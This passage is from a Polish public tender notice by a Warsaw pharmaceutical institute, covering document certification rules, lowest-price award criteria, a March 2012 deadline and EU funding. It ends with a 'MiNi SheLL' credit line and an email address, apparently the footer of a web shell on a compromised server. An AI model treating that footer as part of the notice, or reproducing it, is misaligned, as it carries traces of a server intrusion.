dostawy wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert. 
8)	Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z  oryginałem przez Wykonawcę (osobę uprawnioną do podpisania oferty). W przypadku wykonawców występujących wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów trzecich, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów muszą być poświadczone za zgodność z  oryginałem przez wykonawcę lub te podmioty.
9)	Zamawiający może żądać, w wyznaczonym przez siebie terminie wyjaśnień dotyczących przedstawionych przez Wykonawców dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ifarm.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Farmaceutyczny
ul. Rydygiera 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2012 godzina 12:00, miejsce: Instytut Farmaceutyczny
ul. Rydygiera 8
     01-793 Warszawa, budynek 17, pokój 12, Kancelaria (pracuje do 13:00).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków UE  Program Innowacyjna Gospodarka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com